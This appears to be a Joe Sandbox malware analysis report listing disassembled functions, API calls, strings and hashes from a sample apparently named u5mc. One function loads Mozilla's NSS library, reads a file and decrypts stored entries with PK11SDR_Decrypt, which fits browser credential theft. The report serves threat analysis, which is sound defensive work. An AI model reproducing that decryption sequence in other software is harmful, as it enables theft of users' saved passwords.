tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6BB30700
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6BB30792
tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6BB307AC
tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6BB307C7
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6BB30814
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6BB3082D
memcpy.VCRUNTIME140(00000000,?,?), ref: 6BB30840
PR_CallOnce.NSS3(6BC92AA4,6BB912D0), ref: 6BB30855
PL_FreeArenaPool.NSS3(?), ref: 6BB3086A
PL_FinishArenaPool.NSS3(?), ref: 6BB30875

Part of subcall function 6BB38280: SECOID_FindOID_Util.NSS3(?,?,?,6BB2FCE5,?), ref: 6BB38293

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6BB308B2
tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6BB308D2
tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6BB308EF

Strings

security, xrefs: 6BB303E7

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: tolower$Arena$Utilstrlen$Pool$Alloc_Value$AllocateCallCriticalDecodeEnterExtensionFindFinishFreeInitItem_NameOnceSectionUnlockZfreememcpymemset
String ID: security
API String ID: 945528069-3315324353
Opcode ID: a6cc9ed0426621c04e9bddb90633db3d8b94480a34301052565b983345cf41c5
Instruction ID: 7ab124f6be73b11899bcbcb0804bf687413b22eca352fe2ef472bc83cdd0d2d4
Opcode Fuzzy Hash: a6cc9ed0426621c04e9bddb90633db3d8b94480a34301052565b983345cf41c5
Instruction Fuzzy Hash: 4DF11975D042E4DBEF11CFA8D8907AEBBB5EF42704F5900A9D855AB301E738E906CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6BB6CB70 Relevance: 42.2, APIs: 14, Strings: 10, Instructions: 225fileCOMMON

Download Yara Rule

APIs

PR_GetEnvSecure.NSS3(NSS_OUTPUT_FILE,6BB8444C,00000000,00000000,00000000,?,6BB47F7C,6BB480DD), ref: 6BB6CB8B

Part of subcall function 6BB21240: TlsGetValue.KERNEL32(00000040,?,6BB2116C,NSPR_LOG_MODULES), ref: 6BB21267
Part of subcall function 6BB21240: EnterCriticalSection.KERNEL32(?,?,?,6BB2116C,NSPR_LOG_MODULES), ref: 6BB2127C
Part of subcall function 6BB21240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6BB2116C,NSPR_LOG_MODULES), ref: 6BB21291
Part of subcall function 6BB21240: PR_Unlock.NSS3(?,?,?,?,6BB2116C,NSPR_LOG_MODULES), ref: 6BB212A0

fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6BC7DEB5,?,6BB8444C,00000000,00000000,00000000,?,6BB47F7C,6BB480DD), ref: 6BB6CB9D
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,?,6BB8444C,00000000,00000000,00000000,?,6BB47F7C,6BB480DD), ref: 6BB6CBAE
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000,?,?,?,?,?,?,?,?,?,6BB8444C,00000000,00000000,00000000), ref: 6BB6CBE6
PR_IntervalToMicroseconds.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6BB8444C,00000000,00000000,00000000), ref: 6BB6CC37
PR_IntervalToMilliseconds.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6BB8444C,00000000,00000000), ref: 6BB6CCA4
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6BB6CD84
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000,?,?,?,?,?,?,?,?,?,?,?,?,6BB8444C,00000000), ref: 6BB6CDA6
PR_IntervalToMilliseconds.NSS3(6BB8444C,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6BB8444C), ref: 6BB6CE02
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6BB6CE59
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001), ref: 6BB6CE64
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6BB6CE72

Strings

# Calls, xrefs: 6BB6CBC8
% Time, xrefs: 6BB6CBB9
%-25s %10d %10d%2s , xrefs: 6BB6CCD3
Maximum number of concurrent open sessions: %d, xrefs: 6BB6CE4A
%25s %10d %10d%2s, xrefs: 6BB6CE33
NSS_OUTPUT_FILE, xrefs: 6BB6CB86
Function, xrefs: 6BB6CBCD
%-25s %10s %12s %12s %10s, xrefs: 6BB6CBD2
Avg., xrefs: 6BB6CBBE
Totals, xrefs: 6BB6CE2E

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: Intervalfputc$Milliseconds__acrt_iob_func$CriticalEnterMicrosecondsSectionSecureUnlockValuefclosefflushfopengetenv
String ID: Maximum number of concurrent open sessions: %d$# Calls$% Time$%-25s %10d %10d%2s $%-25s %10s %12s %12s %10s$%25s %10d %10d%2s$Avg.$Function$NSS_OUTPUT_FILE$Totals
API String ID: 2795105899-3917921256
Opcode ID: ba31daf480e61ac78847853c9442c521a6702397e7a0694894c92df213ab9c4b
Instruction ID: ac63a1f80223497f81b6b785078b56178300ea79e05d93fbecfe83f51d7b1449
Opcode Fuzzy Hash: ba31daf480e61ac78847853c9442c521a6702397e7a0694894c92df213ab9c4b
Instruction Fuzzy Hash: 5C718C72D001C05BCF05EB795C42E2EBA759F867C4F144226E90976212F77C9F9186E2

Uniqueness

Uniqueness Score: -1.00%

Function 6BB78300 Relevance: 35.2, APIs: 11, Strings: 9, Instructions: 166COMMON

Download Yara Rule

APIs

PL_strncasecmp.NSS3(SSL,?,00000003), ref: 6BB7839D
PL_strncasecmp.NSS3(ALL,?,00000003), ref: 6BB783B5
PL_strncasecmp.NSS3(NONE,?,00000004), ref: 6BB783D7
PL_strncasecmp.NSS3(SIGNATURE,?,00000009), ref: 6BB783F9
PL_strncasecmp.NSS3(KEY-EXCHANGE,?,0000000C), ref: 6BB7841B
PL_strncasecmp.NSS3(CMS-SIGNATURE,?,0000000D), ref: 6BB78439
PL_strncasecmp.NSS3(ALL-SIGNATURE,?,0000000D), ref: 6BB78451
PR_SetEnv.NSS3(NSS_POLICY_FAIL=1), ref: 6BB784A1
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6BB784AB

Strings

NSS-POLICY-FAIL %.*s: unknown value: %.*s, xrefs: 6BB784BC
CERT-SIGNATURE, xrefs: 6BB78467
SSL, xrefs: 6BB78398
CMS-SIGNATURE, xrefs: 6BB78434
NSS_POLICY_FAIL=1, xrefs: 6BB7849C
ALL-SIGNATURE, xrefs: 6BB7844C
SSL-KEY-EXCHANGE, xrefs: 6BB78482
NONE, xrefs: 6BB783D2
ALL, xrefs: 6BB783B0

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: L_strncasecmp$__acrt_iob_func
String ID: ALL$ALL-SIGNATURE$CERT-SIGNATURE$CMS-SIGNATURE$NONE$NSS-POLICY-FAIL %.*s: unknown value: %.*s$NSS_POLICY_FAIL=1$SSL$SSL-KEY-EXCHANGE
API String ID: 1327721913-282290871
Opcode ID: bc0d24c56bf5edff67686b835e96aa3caf1efc2fd427f820ff2f0552983b8a80
Instruction ID: 47fa711bc709862106ba42a33b0c6102f1de3627b44a8c1ec9879b56c424eaff
Opcode Fuzzy Hash: bc0d24c56bf5edff67686b835e96aa3caf1efc2fd427f820ff2f0552983b8a80
Instruction Fuzzy Hash: F1518B71D001C56BFB307AAA9C41FAF3329DB01348F150075EA65B7282FB6C9A15CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 6BB4AB90 Relevance: 33.4, APIs: 22, Instructions: 388COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6BB4ABCB
EnterCriticalSection.KERNEL32 ref: 6BB4ABE4
TlsGetValue.KERNEL32 ref: 6BB4AC0B
PR_Unlock.NSS3 ref: 6BB4AC7B
TlsGetValue.KERNEL32 ref: 6BB4AC9C
EnterCriticalSection.KERNEL32 ref: 6BB4ACB5
PR_WaitCondVar.NSS3 ref: 6BB4ACD5
TlsGetValue.KERNEL32 ref: 6BB4ACF4

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: Value$CriticalEnterSection$CondUnlockWait
String ID:
API String ID: 839227765-0
Opcode ID: f602c09b8507236f694be31aa3bdccd77ec3904b436a2833a10086da67196da1
Instruction ID: 9ede3c99dc66c6c7f1fde8a9b6eef1cc412939aa0d07675f73b89b7c3bfb533f
Opcode Fuzzy Hash: f602c09b8507236f694be31aa3bdccd77ec3904b436a2833a10086da67196da1
Instruction Fuzzy Hash: 59F148B0904791CFEB10AF38C58576ABBF0FF06304F0085A9D99987255EB38E995DF92

Uniqueness

Uniqueness Score: -1.00%

Function 0040C100 Relevance: 28.4, APIs: 15, Strings: 1, Instructions: 383filestringCOMMON

Download Yara Rule

APIs

NSS_Init.NSS3(00000000), ref: 0040C112

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,04286A48,00000000,?,0041DBAC,00000000,?,?), ref: 0040C1D6
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040C1F3
GetFileSize.KERNEL32(00000000,00000000), ref: 0040C1FF
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040C212

Part of subcall function 00414FF0: malloc.MSVCRT ref: 00414FF8

ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040C242
StrStrA.SHLWAPI(?,04286A30,0041D72E), ref: 0040C260
StrStrA.SHLWAPI(00000000,04286D78), ref: 0040C287
StrStrA.SHLWAPI(?,04287478,00000000,?,0041DBB8,00000000,?,00000000,00000000,?,042808E8,00000000,?,0041DBB4,00000000,?), ref: 0040C405
StrStrA.SHLWAPI(00000000,042875B8), ref: 0040C41C

Part of subcall function 0040BF90: memset.MSVCRT ref: 0040BFC3
Part of subcall function 0040BF90: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,04280898), ref: 0040BFE1
Part of subcall function 0040BF90: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040BFEC
Part of subcall function 0040BF90: PK11_GetInternalKeySlot.NSS3 ref: 0040BFFA
Part of subcall function 0040BF90: PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 0040C015
Part of subcall function 0040BF90: PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 0040C05B
Part of subcall function 0040BF90: memcpy.MSVCRT ref: 0040C082
Part of subcall function 0040BF90: PK11_FreeSlot.NSS3(?), ref: 0040C0D1

StrStrA.SHLWAPI(?,042875B8,00000000,?,0041DBBC,00000000,?,00000000,04280898), ref: 0040C4BD
StrStrA.SHLWAPI(00000000,042809C8), ref: 0040C4D4

Part of subcall function 0040BF90: lstrcat.KERNEL32(?,0041D726), ref: 0040C0B3
Part of subcall function 0040BF90: lstrcat.KERNEL32(?,0041D727), ref: 0040C0C7
Part of subcall function 0040BF90: lstrcat.KERNEL32(?,0041D72A), ref: 0040C0E8

lstrlen.KERNEL32(00000000), ref: 0040C5A7
CloseHandle.KERNEL32(00000000), ref: 0040C5F9
NSS_Shutdown.NSS3 ref: 0040C607

Strings

, xrefs: 0040C133

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: Filelstrcat$lstrcpy$K11_lstrlen$PointerSlot$AuthenticateBinaryCloseCreateCryptDecryptFreeHandleInitInternalReadShutdownSizeStringmallocmemcpymemset
String ID:
API String ID: 2844179199-3916222277
Opcode ID: e5fe73770150aed3939386781e4763a7f88a2c5d9bd31836e5a27adecae89f60
Instruction ID: 16cc530deb27457f536659a64f134916331f5af867ee6c6bf2a367595298ef92
Opcode Fuzzy Hash: e5fe73770150aed3939386781e4763a7f88a2c5d9bd31836e5a27adecae89f60
Instruction Fuzzy Hash: 66E11075910208ABCB14EBA1DC91FEEBB79BF54304F41415EF10667191DF38AA86CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 6BB42340 Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 166memoryCOMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000090,00000008), ref: 6BB42387
PORT_ZAlloc_Util.NSS3(0000000C), ref: 6BB42391

Part of subcall function 6BB90D30: calloc.MOZGLUE ref: 6BB90D50
Part of subcall function 6BB90D30: TlsGetValue.KERNEL32 ref: 6BB90D6D

PORT_Alloc_Util.NSS3(00000000), ref: 6BB423AA

Part of subcall function 6BB90BE0: malloc.MOZGLUE(6BB88D2D,?,00000000,?), ref: 6BB90BF8
Part of subcall function 6BB90BE0: TlsGetValue.KERNEL32(6BB88D2D,?,00000000,?), ref: 6BB90C15

SEC_QuickDERDecodeItem_Util.NSS3(?,?,6BC59F14,?), ref: 6BB423D2

Part of subcall function 6BB8B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6BC618D0,?), ref: 6BB8B095

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6BB423E1
PR_CallOnce.NSS3(6BC92AA4,6BB912D0), ref: 6BB423F5
PL_FreeArenaPool.NSS3(?), ref: 6BB42407
PL_FinishArenaPool.NSS3(?), ref: 6BB4240F
memset.VCRUNTIME140(?,00000000,?), ref: 6BB4244F
memcpy.VCRUNTIME140(?,?,?), ref: 6BB42461
memcpy.VCRUNTIME140(?,?,?), ref: 6BB42495
memset.VCRUNTIME140(?,00000000,?), ref: 6BB424C1
memcpy.VCRUNTIME140(?,?,?), ref: 6BB424D5
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6BB4250A
memcpy.VCRUNTIME140(?,?,?), ref: 6BB42520

Strings

security, xrefs: 6BB42381

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: Utilmemcpy$ArenaPool$Alloc_ErrorItem_Valuememset$CallDecodeFinishFreeInitOnceQuickZfreecallocmalloc
String ID: security
API String ID: 2141008422-3315324353
Opcode ID: 90051c39b8f57d976da7f682d2a0876d8231cec38702f6fa371a30e2bf053e20
Instruction ID: de8b8cad901c8919b794971235d4db1652273b3349e44aaba3d422a166bd7020
Opcode Fuzzy Hash: 90051c39b8f57d976da7f682d2a0876d8231cec38702f6fa371a30e2bf053e20
Instruction Fuzzy Hash: 1251C1B2918341ABD714CF28DC41A1BBBE4FF89754F04892DF958E3251E7399A04DB92

Uniqueness

Uniqueness Score: -1.00%

Function 6BB60370 Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 165memorystringCOMMON

Download Yara Rule

APIs

htonl.WSOCK32(00000000,?,?,?,?,?,?,?,?,?,6BB6031B,00000000,sec,00000003,?,?), ref: 6BB603B3
htonl.WSOCK32(?,00000000,?,?,?,?,?,?,?,?,?,6BB6031B,00000000,sec,00000003,?), ref: 6BB603BB
SECITEM_AllocItem_Util.NSS3(00000000,00000000,-00000009,?,00000000,?,?,?,?,?,?,?,?,?,6BB6031B,00000000), ref: 6BB603E3
memcpy.VCRUNTIME140(?,00000000,?), ref: 6BB6041E
memcpy.VCRUNTIME140(?,00000000,?), ref: 6BB60431
memcpy.VCRUNTIME140(?,00000000,?), ref: 6BB60449
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(key,00000000), ref: 6BB60494
PK11_DeriveWithTemplate.NSS3(?,0000402B,?,0000402A,0000010C,?,00000000,00000000,00000000), ref: 6BB604C2
PK11_ExtractKeyValue.NSS3(00000000), ref: 6BB604D7
PK11_FreeSymKey.NSS3(00000000), ref: 6BB604F1
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6BB6052B

Part of subcall function 6BB8FAB0: free.MOZGLUE(?,-00000001,?,?,6BB2F673,00000000,00000000), ref: 6BB8FAC7

Strings

HPKE, xrefs: 6BB60406
E-v1, xrefs: 6BB6040D
key, xrefs: 6BB6048F

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: K11_memcpy$Item_Utilhtonl$AllocDeriveExtractFreeTemplateValueWithZfreefreestrcmp
String ID: E-v1$HPKE$key
API String ID: 4194264210-290671518
Opcode ID: 5aae5db41efc327478a6f807332f101e9b504c4541ed985a4a049be43a63d87c
Instruction ID: 3d79bdc70952e98a10afeeb4c1abf060a475ce8d18a201cbdcd606904dd53626
Opcode Fuzzy Hash: 5aae5db41efc327478a6f807332f101e9b504c4541ed985a4a049be43a63d87c
Instruction Fuzzy Hash: 54519DB2904341ABD710CF25DC81A5BB7E8EF98358F054968FC5997352F739D904CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6BB9A3F0 Relevance: 25.8, APIs: 17, Instructions: 261stringmemoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6BB9A43E

Part of subcall function 6BB914C0: TlsGetValue.KERNEL32 ref: 6BB914E0
Part of subcall function 6BB914C0: EnterCriticalSection.KERNEL32 ref: 6BB914F5
Part of subcall function 6BB914C0: PR_Unlock.NSS3 ref: 6BB9150D

PORT_ArenaMark_Util.NSS3(FFFFFFFF,?,?,?,?,?,?,00000000,?,-0000001C,?,6BB9A7B5,?), ref: 6BB9A457
PORT_ArenaAlloc_Util.NSS3(FFFFFFFF,00000018,?,?,?,?,?,?,?,00000000,?,-0000001C,?,6BB9A7B5,?), ref: 6BB9A464

Part of subcall function 6BB910C0: TlsGetValue.KERNEL32(?,6BB38802,00000000,00000008,?,6BB2EF74,00000000), ref: 6BB910F3
Part of subcall function 6BB910C0: EnterCriticalSection.KERNEL32(?,?,6BB38802,00000000,00000008,?,6BB2EF74,00000000), ref: 6BB9110C
Part of subcall function 6BB910C0: PL_ArenaAllocate.NSS3(?,?,?,6BB38802,00000000,00000008,?,6BB2EF74,00000000), ref: 6BB91141
Part of subcall function 6BB910C0: PR_Unlock.NSS3(?,?,?,6BB38802,00000000,00000008,?,6BB2EF74,00000000), ref: 6BB91182
Part of subcall function 6BB910C0: TlsGetValue.KERNEL32(?,6BB38802,00000000,00000008,?,6BB2EF74,00000000), ref: 6BB9119C

SECOID_FindOIDByTag_Util.NSS3(000000A8,?,?,?,?,?,?,?,?,?,00000000,?,-0000001C,?,6BB9A7B5,?), ref: 6BB9A48D

Part of subcall function 6BB90840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6BB908B4

SECITEM_CopyItem_Util.NSS3(FFFFFFFF,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000,?,-0000001C), ref: 6BB9A49F

Part of subcall function 6BB8FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6BB88D2D,?,00000000,?), ref: 6BB8FB85
Part of subcall function 6BB8FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6BB8FBB1

PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,00000000,?,-0000001C), ref: 6BB9A4B2
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,00000000,?,-0000001C), ref: 6BB9A4DF
SECITEM_CopyItem_Util.NSS3(?,?,0000003C), ref: 6BB9A526
CERT_CertChainFromCert.NSS3(00000000,00000000,00000001), ref: 6BB9A545
SECITEM_CompareItem_Util.NSS3(00000000,?), ref: 6BB9A583
CERT_FindCertByDERCert.NSS3(00000000), ref: 6BB9A59A
CERT_DestroyCertificate.NSS3(00000000), ref: 6BB9A5C7
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6BB9A5E9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6BB9A61B
strchr.VCRUNTIME140(?,0000003A), ref: 6BB9A6CD
PORT_ArenaStrdup_Util.NSS3(?,-00000001), ref: 6BB9A6E5
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6BB9A704

Memory Dump Source

Source File: 00000001.00000002.2187866101.000000006BAB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6BAB0000, based on PE: true

Associated: 00000001.00000002.2187844571.000000006BAB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188066570.000000006BC8E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188085985.000000006BC8F000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188104178.000000006BC90000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2188121969.000000006BC95000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bab0000_u5mc.jbxd

Similarity

API ID: Util$Arena$Cert$ErrorItem_Value$Alloc_Arena_CopyCriticalEnterFindFreeMark_SectionUnlock$AllocateCertificateChainCompareDestroyFromStrdup_Tag_memcpystrchrstrlen
String ID:
API String ID: 505009375-0
Opcode ID: ab2c0a88f4ed44cecd23ec1009dd91110a28701bd2279fe62264842e1193caa7
Instruction ID: 1a20791a643b3603edfa12ffec2096ee20ed33fbc393e5a6edccfcc06e84fe0d
Opcode Fuzzy Hash: ab2c0a88f4ed44cecd23ec1009dd91110a28701bd2279fe62264842e1193caa7
Instruction Fuzzy Hash: 38919271E04380ABE700AF24EC42B2F77A5EF96748F148538E85997291E779E914CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0040FAE0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 145stringCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,block), ref: 0040FB05
ExitProcess.KERNEL32 ref: 0040FB11
strtok_s.MSVCRT ref: 0040FB28

Strings

block, xrefs: 0040FAF7

Memory Dump Source

Source File: 00000001.00000002.2124203765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2124203765.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2124203765.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5mc.jbxd

Yara matches

Similarity

API ID: ExitProcessstrtok_s
String ID: block
API String ID: 3407564107-2199623458
Opcode ID: 52d09828bd6328d95c269d46c52906f376363bf45c2a71b165d5bab26f2389d9
Instruction ID: 7825bcbe27da9618b603611e1cfecd621835b499ad6dca7fa43ef563d7fd58f0
Opcode Fuzzy Hash: 52d09828bd6328d95c269d46c52906f376363bf45c2a71b165d5bab26f2389d9
Instruction Fuzzy Hash: 0F514074A08209EFDB20DFA1D955BAE77B5BF44305F10807AE802B76C0D778E985CB59

Uniqueness

Uniqueness Score: -1.00%

Function 6BB5E300 Relevance: 19.8, APIs: 13, Instructions: 326memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6BB5E33C
EnterCriticalSection.KERNEL32(?), ref: 6BB5E350
PR_SetError.NSS3(00000000,00000000), ref: 6BB5E4E9

Part of subcall function 6BBDC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6BBDC2BF

memcpy.VCRUNTIME140(?,?,?), ref: 6BB5E518
free.MOZGLUE(?), ref: 6BB5E527
